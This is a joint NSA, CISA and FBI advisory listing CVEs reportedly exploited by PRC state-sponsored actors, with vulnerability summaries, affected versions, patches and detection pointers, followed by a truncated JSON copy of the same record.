### Summary
This joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People’s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.
This joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).
NSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.
For more information on PRC state-sponsored malicious cyber activity, see CISA’s [China Cyber Threat Overview and Advisories webpage](<https://www.cisa.gov/uscert/china>), FBI’s [Industry Alerts](<https://www.ic3.gov/Home/IndustryAlerts>), and NSA’s [Cybersecurity Advisories & Guidance](<https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/>).
Download the PDF version of this report: [pdf, 409 KB](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>)
### Technical Details
NSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques—some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.
PRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.
_Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020_
Vendor
|
CVE
|
Vulnerability Type
---|---|---
Apache Log4j
|
CVE-2021-44228
|
Remote Code Execution
Pulse Connect Secure
|
CVE-2019-11510
|
Arbitrary File Read
GitLab CE/EE
|
CVE-2021-22205
|
Remote Code Execution
Atlassian
|
CVE-2022-26134
|
Remote Code Execution
Microsoft Exchange
|
CVE-2021-26855
|
Remote Code Execution
F5 Big-IP
|
CVE-2020-5902
|
Remote Code Execution
VMware vCenter Server
|
CVE-2021-22005
|
Arbitrary File Upload
Citrix ADC
|
CVE-2019-19781
|
Path Traversal
Cisco Hyperflex
|
CVE-2021-1497
|
Command Line Execution
Buffalo WSR
|
CVE-2021-20090
|
Relative Path Traversal
Atlassian Confluence Server and Data Center
|
CVE-2021-26084
|
Remote Code Execution
Hikvision Webserver
|
CVE-2021-36260
|
Command Injection
Sitecore XP
|
CVE-2021-42237
|
Remote Code Execution
F5 Big-IP
|
CVE-2022-1388
|
Remote Code Execution
Apache
|
CVE-2022-24112
|
Authentication Bypass by Spoofing
ZOHO
|
CVE-2021-40539
|
Remote Code Execution
Microsoft
|
CVE-2021-26857
|
Remote Code Execution
Microsoft
|
CVE-2021-26858
|
Remote Code Execution
Microsoft
|
CVE-2021-27065
|
Remote Code Execution
Apache HTTP Server
|
CVE-2021-41773
|
Path Traversal
These state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see [People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/>).
### Mitigations
NSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.
* Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).
* Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised.
* Block obsolete or unused protocols at the network edge.
* Upgrade or replace end-of-life devices.
* Move toward the Zero Trust security model.
* Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.
## Appendix A
_Table II: Apache CVE-2021-44228_
Apache CVE-2021-44228 CVSS 3.0: 10 (Critical)
---
_Vulnerability Description_
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
_Recommended Mitigations_
* Apply patches provided by vendor and perform required system updates.
_Detection Methods_
* See vendor’s [Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>).
_Vulnerable Technologies and Versions_
There are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>.
_Table III: Pulse CVE-2019-11510_
Pulse CVE-2019-11510 CVSS 3.0: 10 (Critical)
---
_Vulnerability Description_
This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file reading vulnerability.
_Recommended Mitigations_
* Apply patches provided by vendor and perform required system updates.
_Detection Methods_
* Use CISA’s “Check Your Pulse” Tool.
_Vulnerable Technologies and Versions_
Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
_Table IV: GitLab CVE-2021-22205_
GitLab CVE-2021-22205 CVSS 3.0: 10 (Critical)
---
_Vulnerability Description_
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution.
_Recommended Mitigations_
* Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.
* Hotpatch is available via GitLab.
_Detection Methods_
* Investigate logfiles.
* Check GitLab Workhorse.
_Vulnerable Technologies and Versions_
Gitlab CE/EE.
_Table V: Atlassian CVE-2022-26134_
Atlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1.
_Recommended Mitigations_
* Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions.
* Ensure Internet-facing servers are up-to-date and have secure compliance practices.
* Short term workaround is provided [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>).
_Detection Methods_
N/A
_Vulnerable Technologies and Versions_
All supported versions of Confluence Server and Data Center
Confluence Server and Data Center versions after 1.3.0
_Table VI: Microsoft CVE-2021-26855_
Microsoft CVE-2021-26855 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
Microsoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity.
_Recommended Mitigations_
* Apply the appropriate Microsoft Security Update.
* Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)
* Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)
* Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)
* Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)
* Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)
* Restrict untrusted connections.
_Detection Methods_
* Analyze Exchange product logs for evidence of exploitation.
* Scan for known webshells.
_Vulnerable Technologies and Versions_
Microsoft Exchange 2013, 2016, and 2019.
_Table VII: F5 CVE-2020-5902_
F5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
_Recommended Mitigations_
* Apply FY BIG-IP Update.
* Restrict access to the configuration utility.
_Detection Methods_
* Use F5’s [CVE-2020-5902 IoC Detection Tool](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).
* Additional detection methods can be found at <https://support.f5.com/csp/article/K52145254>.
_Vulnerable Technologies and Versions_
F5 Big-IP Access Policy Manager
F5 Big-IP Advanced Firewall Manager
F5 Big-IP Advanced Web Application Firewall
F5 Big-IP Analytics
F5 Big-IP Application Acceleration Manager
F5 Big-IP Application Security Manager
F5 Big-IP Ddos Hybrid Defender
F5 Big-IP Domain Name System (DNS)
F5 Big-IP Fraud Protection Service (FPS)
F5 Big-IP Global Traffic Manager (GTM)
F5 Big-IP Link Controller
F5 Networks Big-IP Local Traffic Manager (LTM)
F5 Big-IP Policy Enforcement Manager (PEM)
F5 SSL Orchestrator
_References_
<https://support.f5.com/csp/article/K00091341>
<https://support.f5.com/csp/article/K07051153>
<https://support.f5.com/csp/article/K20346072>
<https://support.f5.com/csp/article/K31301245>
<https://support.f5.com/csp/article/K33023560>
<https://support.f5.com/csp/article/K43638305>
<https://support.f5.com/csp/article/K52145254>
<https://support.f5.com/csp/article/K82518062>
_Table VIII: VMware CVE-2021-22005_
VMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
_Recommended Mitigations_
* Apply Vendor Updates.
_Detection Methods_
N/A
_Vulnerable Technologies and Versions_
VMware Cloud Foundation
VMware VCenter Server
_Table IX: Citrix CVE-2019-19781_
Citrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
_Recommended Mitigations_
* Apply vendor [mitigations](<https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781>).
* Use the CTX269180 - [CVE-2019-19781 Verification Tool](<https://support.citrix.com/article/CTX269180/cve201919781-verification-tool>) provided by Citrix.
_Detection Methods_
N/A
_Vulnerable Technologies and Versions_
Citrix ADC, Gateway, and SD-WAN WANOP
_Table X: Cisco CVE-2021-1497_
Cisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory.
_Recommended Mitigations_
* Apply Cisco software updates.
_Detection Methods_
* Look at the Snort [Rules](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details>) provided by Cisco.
_Vulnerable Technologies and Versions_
Cisco Hyperflex Hx Data Platform 4.0(2A)
_Table XI: Buffalo CVE-2021-20090_
Buffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote malicious actors to bypass authentication.
_Recommended Mitigations_
* Update firmware to latest available version.
_Detection Methods_
* N/A
_Vulnerable Technologies and Versions_
Buffalo Wsr-2533Dhpl2-Bk Firmware
Buffalo Wsr-2533Dhp3-Bk Firmware
_Table XII: Atlassian CVE-2021-26084_
Atlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5.
_Recommended Mitigations_
* Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.
* Avoid using end-of-life devices.
* Use Intrusion Detection Systems (IDS).
_Detection Methods_
N/A
_Vulnerable Technologies and Versions_
Atlassian Confluence
Atlassian Confluence Server
Atlassian Data Center
Atlassian Jira Data Center
_Table XIII: Hikvision CVE-2021-36260_
Hikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands.
_Recommended Mitigations_
* Apply the latest firmware updates.
_Detection Methods_
N/A
_Vulnerable Technologies and Versions_
Various Hikvision Firmware to include Ds, Ids, and Ptz
_References_
<https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260>
_Table XIV: Sitecore CVE-2021-42237_
Sitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
_Recommended Mitigations_
* Update to latest version.
* Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx.
_Detection Methods_
* N/A
_Vulnerable Technologies and Versions_
Sitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2
Sitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7
Sitecore Experience Platform 8.0 Service Pack 1
Sitecore Experience Platform 8.1, and Update 1-Update 3
Sitecore Experience Platform 8.2, and Update 1-Update 7
_Table XV: F5 CVE-2022-1388_
F5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
_Recommended Mitigations_
* Block iControl REST access through the self IP address.
* Block iControl REST access through the management interface.
* Modify the BIG-IP httpd configuration.
_Detection Methods_
N/A
_Vulnerable Technologies and Versions_
Big IP versions:
16.1.0-16.1.2
15.1.0-15.1.5
14.1.0-14.1.4
13.1.0-13.1.4
12.1.0-12.1.6
11.6.1-11.6.5
_Table XVI: Apache CVE-2022-24112_
Apache CVE-2022-24112 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
A malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
_Recommended Mitigations_
* In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.
* Update to 2.10.4 or 2.12.1.
_Detection Methods_
N/A
_Vulnerable Technologies and Versions_
Apache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)
LTS versions of Apache APISIX between 2.10.0 and 2.10.4
_Table XVII: ZOHO CVE-2021-40539_
ZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical)
---
_Vulnerability Description_
Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.
_Recommended Mitigations_
* Upgrade to latest version.
_Detection Methods_
* Run ManageEngine’s detection tool.
* Check for specific files and [logs](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html>).
_Vulnerable Technologies and Versions_
Zoho Corp ManageEngine ADSelfService Plus
_Table XVIII: Microsoft CVE-2021-26857_
Microsoft CVE-2021-26857 CVSS 3.0: 7.8 (High)
---
_Vulnerability Description_
Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
_Recommended Mitigations_
* Update to support latest version.
* Install Microsoft security patch.
* Use Microsoft Exchange On-Premises Mitigation Tool.
_Detection Methods_
* Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.
* Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log.
_Vulnerable Technologies and Versions_
Microsoft Exchange Servers
_Table XIX: Microsoft CVE-2021-26858_
Microsoft CVE-2021-26858 CVSS 3.0: 7.8 (High)
---
_Vulnerability Description_
Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
_Recommended Mitigations_
* Update to support latest version.
* Install Microsoft security patch.
* Use Microsoft Exchange On-Premises Mitigation Tool.
_Detection Methods_
* Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.
* Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>.
_Vulnerable Technologies and Versions_
Microsoft Exchange Servers
_Table XX: Microsoft CVE-2021-27065_
Microsoft CVE-2021-27065 CVSS 3.0: 7.8 (High)
---
_Vulnerability Description_
Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
_Recommended Mitigations_
* Update to support latest version.
* Install Microsoft security patch.
* Use Microsoft Exchange On-Premises Mitigation Tool.
_Detection Methods_
* Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.
* Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>.
_Vulnerable Technologies and Versions_
Microsoft Exchange Servers
_References_
<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>
_Table XXI: Apache CVE-2021-41773_
Apache CVE-2021-41773 CVSS 3.0: 7.5 (High)
---
_Vulnerability Description_
This vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied," these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013).
_Recommended Mitigations_
* Apply update or patch.
_Detection Methods_
* Commercially available scanners can detect CVE.
_Vulnerable Technologies and Versions_
Apache HTTP Server 2.4.49 and 2.4.50
Fedoraproject Fedora 34 and 35
Oracle Instantis Enterprise Track 17.1-17.3
Netapp Cloud Backup
### Revisions
Initial Publication: October 6, 2022
{"id": "AA22-279A", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People\u2019s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.\n\nThis joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nNSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories webpage](<https://www.cisa.gov/uscert/china>), FBI\u2019s [Industry Alerts](<https://www.ic3.gov/Home/IndustryAlerts>), and NSA\u2019s [Cybersecurity Advisories & Guidance](<https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/>). \n\nDownload the PDF version of this report: [pdf, 409 KB](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>)\n\n### Technical Details\n\nNSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques\u2014some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.\n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.\n\n_Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nVulnerability Type \n \n---|---|--- \n \nApache Log4j\n\n| \n\nCVE-2021-44228\n\n| \n\nRemote Code Execution \n \nPulse Connect Secure\n\n| \n\nCVE-2019-11510\n\n| \n\nArbitrary File Read \n \nGitLab CE/EE\n\n| \n\nCVE-2021-22205\n\n| \n\nRemote Code Execution \n \nAtlassian\n\n| \n\nCVE-2022-26134\n\n| \n\nRemote Code Execution \n \nMicrosoft Exchange\n\n| \n\nCVE-2021-26855\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2020-5902\n\n| \n\nRemote Code Execution \n \nVMware vCenter Server\n\n| \n\nCVE-2021-22005\n\n| \n\nArbitrary File Upload \n \nCitrix ADC\n\n| \n\nCVE-2019-19781\n\n| \n\nPath Traversal \n \nCisco Hyperflex\n\n| \n\nCVE-2021-1497\n\n| \n\nCommand Line Execution \n \nBuffalo WSR\n\n| \n\nCVE-2021-20090\n\n| \n\nRelative Path Traversal \n \nAtlassian Confluence Server and Data Center\n\n| \n\nCVE-2021-26084\n\n| \n\nRemote Code Execution \n \nHikvision Webserver\n\n| \n\nCVE-2021-36260\n\n| \n\nCommand Injection \n \nSitecore XP\n\n| \n\nCVE-2021-42237\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2022-1388\n\n| \n\nRemote Code Execution \n \nApache\n\n| \n\nCVE-2022-24112\n\n| \n\nAuthentication Bypass by Spoofing \n \nZOHO\n\n| \n\nCVE-2021-40539\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26857\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26858\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-27065\n\n| \n\nRemote Code Execution \n \nApache HTTP Server\n\n| \n\nCVE-2021-41773\n\n| \n\nPath Traversal \n \nThese state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see [People\u2019s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/>).\n\n### Mitigations\n\nNSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.\n\n * Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices.\n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\n\n## Appendix A\n\n_Table II: Apache CVE-2021-44228_\n\nApache CVE-2021-44228 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nApache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * See vendor\u2019s [Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>). \n \n_Vulnerable Technologies and Versions_\n\nThere are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>. \n \n_Table III: Pulse CVE-2019-11510_\n\nPulse CVE-2019-11510 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file reading vulnerability. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * Use CISA\u2019s \u201cCheck Your Pulse\u201d Tool. \n \n_Vulnerable Technologies and Versions_\n\nPulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n \n_Table IV: GitLab CVE-2021-22205_\n\nGitLab CVE-2021-22205 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nAn issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution. \n \n_Recommended Mitigations_\n\n * Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.\n * Hotpatch is available via GitLab. \n \n_Detection Methods_\n\n * Investigate logfiles.\n * Check GitLab Workhorse. \n \n_Vulnerable Technologies and Versions_\n\nGitlab CE/EE. \n \n_Table V: Atlassian CVE-2022-26134_\n\nAtlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1. \n \n_Recommended Mitigations_\n\n * Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. \n * Ensure Internet-facing servers are up-to-date and have secure compliance practices. \n * Short term workaround is provided [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAll supported versions of Confluence Server and Data Center\n\nConfluence Server and Data Center versions after 1.3.0 \n \n_Table VI: Microsoft CVE-2021-26855_\n\nMicrosoft CVE-2021-26855 CVSS 3.0: 9.8 